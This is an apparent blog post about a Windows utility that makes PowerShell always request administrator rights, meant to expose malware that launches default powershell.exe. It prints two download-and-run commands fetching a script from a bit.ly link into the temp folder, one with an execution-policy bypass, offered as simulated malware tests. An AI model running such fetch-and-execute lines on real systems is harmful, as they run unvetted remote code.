It's a simple way to monitor invocation of scripts from some rogue/hack attempts that uses default powershell.exe command to launch scripts. Clever and recent Powershell malware download there own builds of the poweshell.exe.
The following image of malware is an example is from Trend Micro "Security 101: The Rise of Fileless Threats that Abuse PowerShell" will not work, it will force the UAC pop-up upon using install this.
 |
| A code snapshot of macro malware that uses “^” for command shell obfuscation. (using this script will force UAC pop-up) |
(New-Object System.Net.WebClient).DownloadFile('https://bit.ly/Readkeyps1',"$env:temp\Readkey.ps1"); & "$env:temp\Readkey.ps1" -u
it will run and wait for a key to be pressed. https://bit.ly/Readkeyps1 downloads Readkey.ps1
Or this command past into choose Windows Start->RUN (simulate use by malware)
cmd.exe /c powershell.exe -executionpolicy bypass -command "(New-Object System.Net.WebClient).DownloadFile('http://bit.ly/Readkeyps1',\"$env:temp\Readkey.ps1\"); & \"$env:temp\Readkey.ps1\" -u"
-WindowStyle Hidden is removed because it would hide the input key Powershell window.
After install of this script, you'll get UAC pop-up (see image below).
will fail from any other directory that C:\windows and 2 directories below.
PowerShell running as Admin
Setting Privileged Level is not accessible otherwise via Properties window in these default Windows 10+ directories;
- x64 DIRECTORY - C:\Windows\System32\WindowsPowerShell\v1.0\
- x32 DIRECTORY - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\
 |
| In Windows 10, the Compatibility tab is not available |
This utility has the following features;
This .inf installer copies the current default Powershell.exe location to C:\Windows\Powershell.exe, to become new default windows Powershell.exe that will be run.
Does not install any software, just sets some registry settings to enable the registry setting. Additionally, it provides a proper uninstall option.
Bonus:
- Works in Windows 10+ (and equivalent Server versions).
- comes with proper uninstaller located in "Add or Remove Programs" or Programs and Features
↓ PowershellexeRunAsAdminWin10BatFile.zip
Install 64-bits Only
Prerequisite: Your user account must be part Administrators group or you know Administrator password to install.
1. Tip! Back-up your registry as a precaution.
2. Download and Unzip file ↓PowershellexeRunAsAdminWin10BatFile.zip
3. Simply, right-click onPowershellexeRunAsAdminWin10.bat
and Run as administrator, that's it.
Uninstall
The great thing about this script file, is it creates a uninstall option.
Search for "Add or Remove Programs" or goto Programs and Features, and right-click on the "Powershell.exe Run as Admin Win 10 (Uninstall only)" and choose Uninstall to completely remove.
Windows Major Updates
You may have to reinstall this to run any updates to Powershell platform.
Similar Utilities of Interest
No comments:
Post a Comment